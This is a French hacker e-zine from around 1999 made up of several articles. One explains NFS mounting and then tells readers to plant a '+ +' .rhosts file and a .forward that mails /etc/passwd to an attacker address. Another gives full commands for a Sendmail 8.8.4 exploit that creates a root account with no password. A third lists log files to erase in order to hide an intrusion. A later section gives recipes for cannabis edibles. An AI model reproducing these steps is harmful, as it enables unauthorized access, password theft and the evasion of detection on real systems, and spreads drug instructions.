Na-Z pour son article
kernal2 pour son serveur 208.226.48.179
et pi c tout
voila a++++
Killer
o_killer_o@hotmail.com
X===========X======X
+ 7 .NFS + KayN +
X===========X======X
Me revoilà avec un nouvel article, enfin pas si nouveau que ca en fait, mais je le trouve
assez interessant par ce qu'il permet d'avoir un bon apercu du fonctionnement rezo sous
linux et du partage fichiers. Et ceux qui voudraient dire que je suis pas capable de
faire un article avec un sujet de + de 3 lettres, ont tort!! mon prochain article portera
sur LILO ;))) bon, comme tjs, vous devez avoir linux, ou bien n'importe quel systeme UNIX
qui gere le mountage du NFS (m'enfin linux c mieux ;). Bon c partiiiiii !!!!!!
- C koooooooiiiiii ???
NFS : nouille-fromage-sucre . beeeuurkk ! ils me font halluciner ceux qui mettent du
sucre dans les pattes !! c immonde !
nan, serieux, NFS ca veut dire Network File System. Z'etes content de le savoir, hein ?
En fait, ca permet de partager les fichiers entre différentes machines montées toute en
rezo, LAN, intranet, internet ...
Mais a la difference du ftp où il faut se logger avec un login et un pass a chaque fois,
le NFS permet de mounter tout simplement un disque d'un server sur ton petit pc. Bien sur,
n'importe kel blaireau ne peut pas se connecter; cela tiens en fait de l'admin (comme bcp
de chose sous unix) et comment qu'il gere son server. Il doit spécifier quels repertoires
il veut exporter et à qui. Fini la théorie, passons à la démonstration ca sera +
compréhensible (mais j'explique bien non ??)
Y'a une commande bien pratique pour voir sur une machine distante les fichiers et
repertoires qu'elle exporte, et qui donc peuvent etre mounté, selon l'user. C....
(suspens).... showmount
Et en plus je vous dis comment l'utiliser !
(NdRiTuaL : merci du cadeau ;) Si vous envoyer 3 mail vous recevrez une photo
de KayN !!=] (j'suis curieux de voir ca !!) )
# showmount -e www.yoda.org
Export list for www.yoda.org
/mnt/cdrom (everyone)
/export/falcon (solo)
Commentation : le -e c pour voir la liste de ce qui est exporté seulement, et ce qu'il y
a ensuite, c'est .... ben le server distant. Ensuite " /mnt/cdrom " est exporté à tout le
monde (" everyone " pour ceux qui comprennent l'anglais ;) et " /export/falcon " est
seulement pour " solo ". C pas compilqué, si tu comprends pas, je peux plus grand chose
pour toi. Mais comme j'ai dis precédemment, le NFS permet de 'mettre simplement un disque
distant sur son pc' En langage unix : le mounter. Donc on utilise la commande ...
(resuspens) .... mount !! c'etais dur! Et je remontre comment qu'on fais :
# mount -t nfs www.yoda.org:/usr /mnt/rebellion
Descriptation : Pour ceux qui connaissent pas le -t , achetez vous un bouquin sur linux
et lisez, parce que c une commande immanquable (comme peugeot... désolé...). Bon le type
: " nfs " bien sur. Ensuite c l'adresse du server distant " www.yoda.org " suivant de
" :/mnt/cdrom " c'est à dire le repertoire qu'on veut monter et qui est en everyone. Et
finalement, " /mnt/rebellion " le repertoire local où l'on mount le tout.
Maintenant si tu vas voir dans ton /mnt/rebellion tu t'apecevra que le repertoire
/mnt/cdrom de www.yoda.org y est !
Magic nan !
Mais ca serait trop simple;de s'arreter ici nan ? Je continue !
En fait, ce qui suis c valable pour n'importe où n'importe quand, bien sur, y'a les
restrictions de lecture, écriture ... enfin je vous donne quelques exemples :
regardez bien les repertoires où vous pouvez écrire, c la clé de tout! Bien sur c rare,
mais en cherchant bien, on trouve. Et ensuite on s'empresse de y laisser un petit .rhosts
comme ca, et pourquoi pas un .forward t'en qu'on y est !
pour le .forward doit contenir " |/bin/mail dark@vader.org < /etc/passwd " comme ca, un
petit fichier a cracker
le .rhosts, lui, doit avoir seulement " + + " ou bien autre chose, tatn que votre nom de
domaine y est, c bon.
Un petit conseil: vous avez surement deja passez des heures à regarder le fichier que
vous avez, a faire des ls, cd .. pis cd x et ls ... faites pareil, mais en plus rapide!
en allant directement au endroits sensibles ! c'est à dire /var pour les logs, et recup
des pass de conenction, /etc des fois que vous pourriez recup le passwd, etc...
Bon, je vais pas tout vous dire non plus! a vous de voir suivant ce que vous voulez, où
vous etes etc... c tres variable, et pis c a vous de decider de votre vie ;)
C fini, comme d'hab, c'était pas trop dur je pense, efficace, ca je l'espere, et aussi
interessant. Enfin, c pas tout ca mais j'ai autre chose à faire, donc bonne chance,
mailez moi pour tout renseignement ou autre, je repondrez dan les limites du possible
(c'est a dire si ca me fais pas chier, que j'ai le temps, et que ca m'interesse ;) enfin
tentez tjs, on sait jamais.
Je n'oublie pas de remercier les membres du groupe (pour ceux qui savent pas qui c, ils
sont sités ailleurs, cherchez) sans qui c articles n'aurait pas vu le jour ainsi que
pleins d'autre chose. Et aussi Lord, ethan, cali, joebar... tous ceux qui se reconnetront
(ben vi, mais si je dis pas, ils sauront pas??), sachez que je vous remercie ;p
Allez @+ tout le monde!! Amusez vous bien !!!
X==============================X=========X
+ 8 . L'exploit Sendmail 8.8.4 + Shirker +
X==============================X=========X
[Now booting linux] ...
Too many security fails
Please reinstall your RedHat5.2
and don't install Sendmail8.8.4
[Now booting win98] ...
Ok no proble......merdeuh nan !!!........(blue screen)
--> au p'tain fuck da bill0u
Ok presentation de l'exploit sendmail :
---------------------------------------
cet exploit cree simplement un raccourci de /etc/passwd
a /var/tmp/dead.letter ... simple et efficace quoi ...
par contre il vous faut un access sur le seveur a hacker ...
Commandes a taper :
-------------------
ln /etc/passwd /var/tmp/dead.letter /*lien symbolique*/
telnet target.host 25
mail from: nonexsistent@not.an.actual.host.com
rcpt to: nonexsistent@not.as.actual.host.com
data
lord::0:0:leet shit:/root:/bin/bash
.
quit
Maintenant :
------------
connect en telnet au port 23, log toi en tant que lord, pas de passwd requis
et lord a les memes privileges que root :)
Si ça ne marche pas :
---------------------
/var et / sont sur differentes partitions (le lien symbolique ne marche pas
entre deux partitions differentes...)
/var/tmp n'existe pas ou n'est pas permis en ecriture aux users
le serveur a un compte postmaster ou un alias mail, ou dans ces cas le mail
ou : leur arrive et n'est pas dans /etc/passwd
Greetz: [UtopiA], ToURisT, les ex-membres de TLC, Ackboo <-- pour son putain de site :)
RENAUD SECHAN, ...
shirker@caramail.com
X========================X=================X
+ 9 . Effacer ses traces + RiTuaL & killer +
X========================X=================X
Bon le plus souvent si tu veux pas te faire buster ben t'efface tes trace
sur system que t'as visiter .. ou tu spoof sinon tu fait les 2 c'est encore
mieux ;) Donc avec killer on va lister les endroits où y'a des logs (de connection,
login etc ...) C'est partit
Dans :
/etc/hosts : se fichier contient une liste d'host qui sont connecter
sur le réseau. Se fichier peut etre utile lord d'un hacking pour savoir si
il est possible d'utiliser rsh, rlogin ...
/var/log/secure : contient les log de toute les connection : login, pop3, ftp
etc ...
/var/log/maillog : log tout se qui se passe dans le demon sendmail
/var/log/spooler : log toutes les fois ou qq'un eteint le system (avec
shutdown -h now ou halt etc ...)Peut etre utile si vous
avez un access direct a l'ordinateur.
/var/log/messages : contient tout les message envoyer par le kernel
/usr/adm/sulog (ou su_log) : le fichier sulog (ou su_log) est le
plus souvent dans /var/adm . C'est les logs de tout les SU qui sont
effectuer su le system ... (donc si vous utiliser SU ben ...!)
/usr/adm/loginlog ou /usr/adm/acct/loginlog : ben comme son nom
l'indique. Se fichier garde une trace des logins.. Se fichier n'existe pas sur
tout les systems...
/var/log/xferlog : ca c un fichier ke vous allez utiliser car il log
ttes les commandes au ftp alors, si vous avez utilise un bug ftp ben n'esitez
po.
/var/log/sulog : la, sur les machines SlackWare en tt cas, ya les
logs des sudo. Ce prog est encore en developpement alors ya bcoup de bugs
dessu, cherchez, vous trouverez.
/var/lib/httpd/logs/ : ce repertoire est plein de petits logs sympas.
Je ss pas si vous allez vous procurer access root par httpd mais voila ou sont
les logs
/var/log/syslog : un fichier plein de tous les messages envoyes par
le kernel. Attention a ce fichier, effecez bien vos traces.
Si vous ne laissez deja aucunes traces dans ces fichiers, il est assez dur
k'on vous choppe essayez kand meme de vous renseigner ou vont se trouver les
logs du programme avec lequel vs vs infiltrez. OK?
(NdRiTuaL : Celon votre distribution linux ses fichier ne seron pas au meme
endroit ou n'existerons pas ...
Par exemple tout les /var/log/... Sont sous
red-hat 5.x au minimum...)
Bon la c'est le bordel ..!! On a fait sa vite pis killer est partit en vacance
donc y'as plus moyen de savoir qui a ecrit quoi ! Donc il est possible que
pour le nr 2 on vous reserve cet article mais trier selon les distribution
etc... voila si vou voulez qu'on fasse le tri un mail a x-hacker@caramail.com
Si on a plus de 10 mail on remet ok.?
X======================================X======X
+ 10. COnnection a internet sous linux + N@-Z +
X======================================X======X
**********************C*O*N*N*E*C*T*I*O*N*********A*********I*N*T*E*R*N*E*T***********************************
***********************************************S*O*U*S************************************************************
*LLL III NNN NNN UUU UUU XXX XXX
*LLL III NNNNN NNN UUU UUU XXX XXX
*LLL III NNNNNNN NNN UUU UUU XXX XXX
*LLL III NNN NNNN NNN UUU UUU XXXXX
*LLL III NNN NNNN NNN UUU UUU XXXX
*LLL III NNN NNNNNNN UUU UUU XXXXX
*LLLLLLL III NNN NNNNNN UUUUUUUU XXX XXX
*LLLLLLL III NNN NNNNN UUUUUUUU XXX XXX
******************************************************************************************************************
IMPORTANT: LISEZ TOUT LE FICHIER AVANT D'EXECUTER LE COMMANDES DECRITES ICI!!!!!!
**....** = commantaire à ignorer
Se connecter a Internet, beaucoup se disen "facile!", mais savent-ils se connecter sous linux, ou du moins
connaissent-ils cet etrange, mais tres utile systeme d'exploitation; moi'j dis que n'importe qui peut se
connecter au Web par l'intermediare de Windows95/98/NT (même ceux qui achetent windows pour les nuls...).
Beaucoup nous diraient "se connecter a internet sous Linux??? C'est impossible!!!!", HE BIEN NON!!!
detrompez vous, il est tout a fait possible de se connecter a Internet sous Linux, d'ailleurs ce n'est pas tres
dur, et ce le but de cet article (mon tout premier, mais faut bien commencer par quelque chose...).
Tout d'abord, un truc dont on peut se passer, mais ça peut toujours servir: nous allons tester votre modem
grace à la commande dip; tapez la commande suisvante:
shell:~$dip -t
DIP>port /dev/ttyS0 **ttyS0 est un exemple; il correspond a COM1, mais vous remplacez par votre port**
DIP>term
[ Entering TERMINAL mode. Use Ctrl-] to get bacck ]
atdt#tel **remplacez #tel par un # de telephone n'importe lequel**
Si le modem a decroché c que le test est bon, et que l'on peut passer à la suite, sinon, verifiez le p ort du modem
et refaites le test, et sinon, ... , changez de modem?
Une Fois le test passé, nous allons passer à la configuration du programme qui va vous permettre de vous connecter,
j'ai nommé: ppp.
shell:~$pppsetup
Ceci ouvrira une fenetre bleue dont vous ne saurez quoi en faire, mais pas de panik, je suis la pour vous guider...
On va suivre le setup pas à pas:
-Tout d'abord vous appuyez sur la touche enter pour passer au "compliqué"
-Ensuite vous arrivez a un truc qui vous demande d'entrer dans le cadre bleu un truc avec "atdt278... "; en fait
vous devez entrer dans le cadre "atdt#tel_serveur_de_connection"; la commande atdt sert a decrocher et a marquer
un numero de telphone.
-ensuite il vous demande le n° de port du modem ki va de cua0 a cua3; la vous voyez...
-puis vient la vitesse du modem; vous l'ajusterez au maximum en fonction du la vitesse du votre.
-apres, si votre serveur fait du call-back, vous mettez oui, et sinon vous mettez non.
-pour le cadre suivant, vous laissez en blanc, car ça ne nous sert a rien (du moins pas pour une simple
connection... )
-apres entrez le nom de votre serveur (l'adresse) du type machintruc.com
-dans cette cas vous entrerez le DNS primaire: #.#.#.# ( 1<#<255)
-et finalement le type de connection:
*PAP => vieux serveurs
*CHAP => version non-Microsoft
*MS-CHAP-80 => version Microsoft
*SCRIPT => script...
Dans tout ça, nous allons chiosir MS-CHAP-80
-ensuite apparition d'un cadre qui vous propose 2 choix:
*MS-CHAP-SERVER 1 Stand alone
*MS-CHAP-SERVER 2 Query domain controller...
choisissez le 1
-puis entrez votre login de connection (celui fourni au serveur à chaque connection)
-votre code
Et c fini pour la configuration de ppp: il vous affiche toute vote config ppp; pour demarrer la connection
tapez dans le shell:
shell:~$ppp go
et il faudra attendre quelque minutes avant que le modem demarre; pour terminer une connection vous devrez taper:
shell:~$ppp off
Voila pour la partie compliquee de ppp, maintenant passons a la partie la plus simple de cet article: creation
d'un script de connection. sachez tout d'abord qu'il existe une maniere manuelle de se connecter sous linux
(maniere tres chiante d'ailleurs, c pour cela que l'on fera un script); tapez dans le shell(vous etes prets,
paske c tres long...):
shell~$pppd connect "/usr/sbin/chat \"\" ATDT#tel_serveur CONNECT \"\" ogin: votre_nom_de login word:
votre_mot_de_passe" defaultroute 0.0.0.0:#.#.#.# **#.#.#.#correspond au dns primaire** /dev/ttyS0
** remplacez ttyS0 par votre # de port**
C'est pour eviter de taper cette belle ligne a chaque fois que nous allons creer un script:
Creez un nouveau fichier avec joe (ou l'editeur ke vous voulez, mais joe c celui ke je prefere)en tapant:
shell:~$joe nom_du_script **moi personnellement je l'appellerait "internet"**
une fois le fichier cree, copiez-y LES lignes suivantes:
/usr/sbin/pppd connect "/usr/sbin/chat \"\" ATDT#tel_serveur CONNECT \"\" ogin: votre_nom_de login word:
votre_mot_de_passe" defaultroute 0.0.0.0:#.#.#.# **#.#.#.#correspond au dns primaire** /dev/ttyS0
** remplacez ttyS0 par votre # de port**
et enregistrez le fichier en appuyant sur les touches Ctrl+K et ensuite Ctrl+X
Une fois le fichier sauve, il faut le transformer en executable; pour cela tapez la commande (dans le dossier du
script):
shell:~$chmod +x nom_du_script **ou chmod +x internet pour ceux qui m'ont ecoute...**
Voila, maintenant vous n'avez plus qu'à le copier dans le dossier /usr/sbin/ pour ke vous puissiez l'executer
à n'importe kel endroit (que se soit dans /, /home, /root, /...); pour cela tapez la commande suivante:
shell:~$cp /dossier_ou_se_trouve_le_script/nom_du_script **ou internet** /usr/sbin/nom_du_script
**ou internet**
Puis pour vous connecter, vous n'avez plus qu'à taper dans le shell:
shell:~$nom_du_script **internet pour ceux qui on fait comme moi**
Voila, maintenant avec tout ce ke vous avez appris dans cet article, vous etes capables de vous connecter a
Internet sous Linux sans aucun probleme, mais si vous en avez, n'hesitez pas à m'envoyer des E-mail (de + cet
article et mon premier, alors, de sur j'ai du foutre des conneries...)
Pour finir mon discours, une connection à internet sous linux est très utile car il est impossible d'etre nuke
sous ce magnifique systeme d'exploitation, et il assure egalement un securité incroyable au niveau de la securité.
Sur ces mots, je n'ai plus rien à dire, je ne dirais donc plus rien...
A++
N@-Z
E-mail: I_Dark_Phoenix_I@hotmail.com
IRC: irc.funradio.com #twhc
athena.dyndns.org ##opers, #secure-root, #help
na-z.dyndns.org #twhc, ##opers
GREETZ: Killer -> un bon ami
tous le gars du mag
mes amis de Buenos Aires
""" """" "" St Herblain
""" """" "" San Salvador
(NdRiTuaL : n'éssayer pas d'ecrire a N@-Z car il est mort dans un accident
de voiture se sera donc son 1er et son dernier article pour notre mag, voila
donc nous lui dédions notre 1er E-MAg pour lui rendre un dernier homage en
espérant que c'est se qu'il aurait voulu... voila malheureusement je ne le
connaissais pas assez pour en dire plus sur lui mais je suis sur que c'étais
qq'un de tres bien... Voila, repose en paix N@-Z ... RiTuaL.)
(NdKayN : A notre plus grande surprise et regret, N@-Z décéda a peine un mois
aprés cet article qui fut son premier, et malheuresement son dernier. Je suis
assez mal placé pour vous racontez qui il étais, vu que je ne l'ai jamais
rencontré et que je ne suis pas trop doué pour ca. Tout ca pour vous dire que
nous le regrettons et nous aurions aimé avoir beacoup d'autres articles comme
celui-ci. A bientot n@-z et See you in hell ! KayN.)
(NdKiller: N@-Z pour moa ct un compagnon de travail, de sheet et de tout ce ke
vous voulez. Depuis k'il est plus la, le boulot c plus ca. Le delir est fini
et N@-Z aussi. Vivant un mec bien, mort, un mec mieux dans ma memoire, pour
toujours. Cette dedication au travail, ces dimanches k'il venais travailler
pour ke tout soit en ordre, je vous le dis. Ct un grand homme. Je vais partir
en Europe la, et un des buts de mon trip c d'aller voir ces parents et
presenter en personne mes condoleances, Killer.)
X=====================X========X
+ 11 . Lamer's trip + KayN +
X=====================X========X
Comment avoir un pc hyper-ultra sécurisé et etre le meilleur WaRL0rD !
Papa et maman t'ont acheté un tout nouveau pc pour ton anniversaire. Et ils ne
savent pas que tu est un terrible WaRL0rD !! haha ! Alors à toi, sympatisant
microsoftien, supporter de l'autorun, je vais te donner des conseils pour que
tu prenne soin de ton nouveau jouet et que tu reigne sur la cyberwar du net!
D'abord comme tu es un hacker/cracker/phreaker expérimenté et réputé (tout tes
copains de classe t'admirent), tu approche souvent le danger de pres, et bien
sur, c ton pc qui subit en cas d'incident. Alors sur internet, c la cyber-war,
et tu est au coeur de la bataille, c pour ca que je vais te dire comment te
proteger, afin d'etre encore plus puissant et tu ne craindra plus rien pour
regner sur le net et l'irc !!
1. Un cyber-windows pour internet !
Tu ne tourne que sous windows, linux c pour les barbares. Ton fidele mirc a la
main avec ton script (versions ameliorées de 7th sphere, p2r, et autres, tu a
fais mieux qu'eux rassemblés!) tu defile sur l'irc, et tu recupere pleins de
fichiers. Mais attention, c dangereux! C pour cela qu'il faut que tu recupere
AVANT TOUT les updates de tout ce que tu as!! va sur www.microsoft.com et
là, mets tout a jour, ton winsock et aussi Internet Explorer. C facile, ils te
guident, pendant que ton disque est scannés, tu vas chercher a boire, parce
que ensuite tu vas regarder la barre de telechargement defiler. C booo!! tout
en 3d precalculé windows!
Une fois que tu as installé tout ca, les autres font deja moins les malins
héhé !! Il est maintenant venu les temps de mettre en action un bon antivirus.
SURTOUT ne prends pas ceux que tu pourrait trouver sur internet!! ce sont des
virus eux meme la plupart! Court vite a ton Carrefour, Lecler ou Auchan pour
acheter le plus cher!! c le meilleur! Profite en pour recuper des logiciels
de microsoft, c de la bombe!! Rentre chez toi, et installe tout! haha!
Maintenant tu peux prendre n'importe quel fichiers .bmp ou .jpg sans
probleme, tu es protegé! Il est temps de se preparer a l'irc, lieu actif, et
incontournable. Le mieux, c de cacher ton adresse ip, et c pas dur! Il faut
que tu te mette a la rechercher un programme pour ca : ipspoof.exe ou dans
le genre. C trop trop bien, ca marche impec et là, les mecs ils sont forts
si ils te trouvent! Tu le lance, et tu mets tes infos, ton nom, ton numero
de tel ... Surtout, ne prends pas de firewall, c de la merde, ca coute cher,
ca sert presque a rien, et ca te bloque. Le pire c que ca bloque ICQ, ce
super programme pour chatter et chercher d'autres WaRL0rDz, alors ca serait
dommage! Pour te proteger des splits, il te faut deux mirc qui tournent en
meme temps, mais sur deux servers differents, comme ca, tu pourra reagir et
eviter les takeovers.
On va voir, maintenant qu'on est preparé, comment ATTHACKER sur l'irc, et
montrer ta superiorité de WaRL0rD !
(NdRiTuaL : ha les atthackers !! quel jeu de mot pourri!! remarque c'etais
des pur WaRL0rDz je les salut si ils nous lisent ;)
2. Atthacker , toujours atthacker !
Si tu croise des mecs qui t'enervent, ou meme pas, dis leur directement que
tu est un WaRL0rD, ca les calme souvent, ils font moins les malins. C comme ca
que tu vas faire ta reputation et devenir l'un des maitres de l'irc. Mais au
cas où, je vais t'apprendre les techniques qui feront de toi un mec
indomptables qui depasse les lois de l'irc!
Tout d'abord, le nuke!! ca c de la bombe baby! Deja tu recupere Winnuke et
Icenuke, c deux programes in-dis-pen-sables ! avec ca, t pret pour calmer les
petits malins qui se moquent de toi! Bien sur que les admin de l'irc disent
que c interdit le nuke, mais apres tout! tu es un WaRL0rD ! alors si il te
cherchent les admin, tu les calmeras avec winnuke ! Tu t'entraine a connaitre
l'ip du mec : /dns moi_le_lamer et tu vois : Resolve to 127.0.0.1 Alors
là, tu te depeche de mettre 127.0.0.1 dans le champ de ton nuker et tu appuie
sur le bouton nuke, et là, tu regarde le mec deconnecter sur l'irc! Et quand
il deconnecte, dis a tout le monde que c toi qui l'a calmé!! comme ca, ils te
respecteront, et auront peur!! haha tu commence a devenir le WaRL0rD du
server! je continue comme ca, ta suprematie sera encore + grande. Le mieux, c
de te preparer pour faire des takeover : tu demande aux op de n'importe kel
chan d'etre op; ca peut marcher! ensuite, des que t op, tu ban tout les op! et
tout le monde ensuite!! et là tu change le topic en :
Take0veR bY LaMerMan (lamer@crosoft.com)
Comme ca, tout le monde verra que tu a pris le chan!! tout le monde te craindra
et tout ce que tu demanderas sera fais ! les avantages d'un WaRL0rD !
Bon, maintenant, il te reste plus qu'a connaitre les chevaux de troies!
c des fichiers, qui te permettent de rentrer sur un pc d'un mec!! et oui!!
avec ca, tu es un vrai hacker!! un pur! Don tu envoie le fichier a ta victim,
et ensuite, tu l'execute toi aussi, comme ca, tu sais comment ca se passe sur
son pc, tu te met dans la situation de ta victime! puis ensuite, tu rentre sur
son pc grace au controle du troyen et là, comme tu es un WaRL0rD de la
cyber-net-war, tu efface tout! toi le puissant mettre de l'irc! et là, encore
une fois, tu dis a tout le monde, sur tous les chan que c toi qui a hacker le
pc du mec grave au cheval de troie et que tu es le meilleur WaRL0rD du server,
et que les domines tous, cette bande de larve! HAHAHA !!!!
Voilà donc la technique pour devenir un vrai WaRL0rD comme il en existe sur
l'irc! Ce sont eux qui dominent, les puissants ! eux qui ont la connaissance,
eux qui sont les hacker/cracker/phreaker/carder du monde !!!!!
GR33TZ : BlackBird, Fufusoft, Warlock, Boulibang
(NdRiTuaL : t'as lu alternative (de galaad) puis lis deathlyby 1 et 2 tu
veras sa fait drole !!)
-----------------------------------S-T-O-P-------------------------------------
PUTAIN!!!!! le trip!!! fumette -> lamer trip !!!
mortel!!
Bon, je me dois de donner quelques explications :
Pour ceux qui aurez pas suivi, et qui sont un peu perdus, c une sorte de
parodie. Vous comprenez ?? nan, bon, j'explique: j'en ai TROP TROP TROP marre
des LamerZ qui trainent de partout sur l'irc, et qui polluent l'image de la
scene francaise Ceux si meme comme BlackBird, Fufusoft, Warlock ou Boulibang
(que vous pouvez voir ici irc.funradio.fr: #fufu #hacking-world #atthackers)
Ils m'enervent trop, et en faites, j'ai ecris ca (suite a une fumette arosée,
une parmi tant d'autres...) pour en faite vous montrer leur univers. Je me
tiendrais a votre disposition par email pour vous montrer des logs comme
preuves si vous doutez de l'existence de cons pareils!
(NdRiTuaL : pour les log je
vais en mettre un sur notre site le meilleur !!)
Bon, en faites, jesuppose qu'ils sont responsables de l'etat actuel de
l'underground francais : c a dire po tres actif! Je ressent cet effet qu'ils
provoquent, je suis blazé en fait quand je les vois, pourkoi on reste encore
là quand on voit des mecs pareils ???! ben justement!! pour pas qu'ils
pourissent tout! en effet, notre société est deja pourrie, la preuve, on est mis
ne marge, et eux, c connards!, ils viennent pourrir un peu plus ce qui nous
reste, peut de personnes savent encore faire la difference! Malheuresement! on
se tiens donc a faire des magz et d'essayer de se voir sur irc, mais ca
devient de + en + dur!!!
Alors s'il vous plait!! vous qui pensez comme moi:
BOUGEZ VOUS!! putain, meme si c pour ecrire un article de merde, ou meme un
mail! montrez que vous etes là! Si vous faites de la merde, on vous le dira,
et là deux solutions :
soit tu te vexe et tu t'enerve -> t un con, essaie de tirer profis de la
critique et laisse tomber ou alors reflechis (si tu peux)
soit tu comprends -> bosse, lis, pratique, bref ameliore toi et reviens
montrer ce que tu a appris, et là, on jugera que tu n'est pas un lamer
En bref, si ce que j'ai ecris plus haut t'a fais rire, et si ce que je viens
de te dire sur le lamerz te mets dans le meme etat que moi, bouge toi! et faut
qu'on creve ces pourritures!!! Montront ce que nous sommes en vrai et on va
quand meme pas laisser notre image se faire degrader comme ca, nan !!!
Enfin, c un etat de conscience personnel, comme j'aime bien dire :
Tu fais ce que tu veux !! ca parais evident mais c pas si simple !
J'arrete là!
Merci à : RiTuaL et Killer (of course), ethan, calimer0 et tous les autres
qui supportent mes opinions contre les lamerz.
N'hesitez pas a me mailer a ce sujet, je reponds (en general :)
On va pas se quitter sans une petite note d'humour quand meme ?!!
KayN to RiTuaL : 3 feuilles should be enough
(NdRiTuaL : RiTuaL to KayN : hum I think 5 is more interesting)
(reNdRituaL : J'aivais meme pas fait gaffe regardez kess ki a en dessous!)
X======================X===========X
+ 12. Delire and drugs + X-Hacker +
X======================X===========X
Bon malgrés se titre très explicite je vais vous expliquer cette rebrique de
notre mag :
C'est une idée qu'on a eu (KayN & RiTuaL) un soir quand on se racontait nos
delire... Puis j'me suis dit qu'on allais faire une rebrique ou nos lecteurs
(et nous) pourrons racconter leur delire avec les drugs leur recette aussi
(j'vous en donne deja qq'un sympa ;) et KayN vous raconte un de ses delires )
Donc voila vous savez se qui vous attend dans les prochaine ligne et dans le
prochain nr... Mais pour le momment :
- Le cacao :
Humm un bon cacao le matin quand tu te reveille c cool mail un space cacao
c'est mieux !! Bon alors y vous faut de quoi effriter un 2-3 feuilles puis
faite bouillir du lait quand le lait boue mettez le dans une tasse un verre se
que vous voullez puis melanger le tout avec ce que vous avez effriter et
rajouter du cacao (votre marque préferer) dedans et buvez! (vous pouvez
attendre que sa refroidisse un peut) pis quand vous avez tout bu et qu'il
reste des boulette au fond de la tasse ben mettez un fond d'eau dans le tasse
et enfiler vous le reste des boulettes et voila vous patientez environ 1H00 et
op! vous vous mangerez un claque =) et celon comme vous l'avez dosé le delire
dureras entre 4-8 heures...
(tout mes pote se foutais de ma guelle quand je leur eai dit "hier soir j'me
suis fait un cacao! et CT le delire total!" et un jours je leur ai dit de
venir chez moi qu'on en ferais un les mec y étais niquer mais qqchose de grave
sa m'a fait rire et depuis y s'en fon un de temps en temps voila ct l'anecdote
du jours)
RiTuaL
- Yahourt :
Je suis sur que tout le monde connait le space yahourt mais j'explique quand
meme vite fait :
Tu prend un yahourt au parfin que tu aimes puis 2 cuielleres un grande et une
peitite. Tu effrites bon 2 feuilles puis tu met de l'huile dans la grande
cuiellere et tu rajoute le tos par dessus tu chauffes la cuiellere jusqu'a ce
que l'huile bout et tu verses le tout dans le yahourt (ouvre le avant crétin !
;) ) et avec la petite cuiellere tu racle le tos qui reste au fond de la
grande cuiellere dans le yahourt puis tu melanges le tout et te le bouffe!
Et entre 30min-1H00 après l'effet arrive...
(J'aurais bien decrit les effet produit par le cacao et le yahourt mais perso
j'y arrive pas c un delire a part quand tu fume t'es casser a fond mais là t'a
plutot la pêche t'as envie de delirer a fond etc .. Mais bon si vous voulez
savoir vous avez juste a essayer!! =) )
RiTuaL
Dans le prochain nr kess qu'y aura dans cette rubrique???
- Histoire du LSD
- Nos et vos delires
- Plantage par weed_man
- plein de recette (enfin !! si vous ete sage ;)
- etc ..........
X=================X==========X
+ 13. Nos projets + X-Hacker +
X=================X==========X
Bon alors je vais vous expliquez je que je compte faire quel son mes
projets. Deja notre 1er but est de trouver d'autre membre ayant un niveau
correct ou meme des newbies (mais pas de lame qui nuke et qui flood et qui se
la pete big hacker car c'est eu qui nuise a la reputation des hackers avec les
crasher). Parsque c'est souvent les newbies qui ne se font pas aidez par les
autre qui devienne des lamez donc voila se que je pense donc now je vais
exposer mon projet :
J'aimerais monter un groupe "correct" pas un de ses groupe de lame comme on en
trouve plein dans le genre se qui est raconter sur le site d'azerty0 (ackboo)
(url://www.multimania.com/azerty0/ (enfin je crois!! )
Je tient aussi a faire de la pub pour un pote qui veux cree un E-Mag sur la
programation... Je croit qu'il a commencer un mag mais il en a eu mare paske
c'etais le seul presque a ecrire ... Donc voila si vous ete interresser mailer
lui : jolou@francemel.com
RiTuaL
X======================X========X
+14. Mot de la fin ... + RiTuaL +
X======================X========X
Voila au momment ou j'écrit ses ligne notre 1er mag est presque fini !ouf!!!!
Bon je vois pas quoi dire d'autre ... Donc je vous laisse contenplez le
somaire du "X-H-M nr2" bientot en vente sur tout les bon distributeur d'E-Zine;)
Enfin bon dison que d'apres mes estimations il devrais sortir avant la fin de
ses vacance donc au plus tard en septembre (on espère!)Bon voila place au
somaire :
Donc pour nous ecrire :
RiTuaL : ritual@caramail.com
KayN : kayn@caramail.com
killer : o_killer_o@hotmail.com
Shirker : shirker@caramail.com
(merde c deja au debut du mag :p pas grave)
Sinon y'a la boite commune du groupe : x-hacker@caramail.com
Dans le prochain nr :
Qu'est ce qui a dans les borne EDF ---> RiTuaL
Le reseau ECHELON c'est quoi ?? ---> RiTuaL
Back Door linux/Unix ---> RiTuaL
WWWHack (pas sur...sinon pour le 3) ---> RiTuaL
Ne pas se faire choper ---> RiTuaL
Linux pour les newbies (suite) ---> RiTuaL
Siestes ---> KayN
Xplosifs et pétards (kaboom :) ---> KayN
Exploits des entreprises ---> KayN
Apprenez a monter un reso entre 2 Win95 ou 98 ---> Killer
IP Masquerading?? hu?? ---> Killer
Et les Quotas? C koa> ca marche ? ---> Killer
Surement d'autres mais je sais pas encore! ---> killer
Delire and drugs ---> nous et vous
Article des news membres
Heuu voila ! Fini le Nr 1
(NdKayN : pour les blaireaux et les camés, ca veut dire que en dessous, y'a plu rien a lire.
Comme dis Ritual + haut, y'a des perdus de partout!)
(NdRiTuaL : c vrai)
(NdKayN : tu veux avoir le dernier mot?? hein, c ca ?? ben c perdu !!)
(NdRiTuaL : Merde tout se que j'ai fais : crée le goupe etc ... Et j'ai pas le doit au dernier mot ??!!)
(NdKayN : Ouais, mais sans moi, tu serais rien;)
(NdRiTuaL : Sans moi pas de mag ;) )
(NdKayN : sans nous, pas d'articles)
(NdRiTuaL : j'en ai marre j'abendone ....)
(NdKayN : yes!! je l'ai eu !!)
(NdRiTuaL : merde!)
(NdKayN : manqué ta ruse là! )
(NdRiTuaL : Et pourtant c'est moi qui l'ai eu ! ;) )
(NdRiTuaL : c'est bon il fera plus rien il c'est endormis... Donc j'ai gagner!!
J'espère que notre mag vous a plus... aller @+ )
Je lance un concours ;p le 1er mec qui trouve le rapport entre le nom du
groupe et Kevin Mitnick gagne. ..? on vera =) si vous savez pkoi envoyer un
mail a : x-hacker@caramail.com
The EnD
Leader X-Hacker RiTuaL
1er membre recruter killer
2eme menbre (on regrette de l'avoir pris ;) KayN
Le lamer solitaire Shirker
Un dernier salut a notre ami N@-Z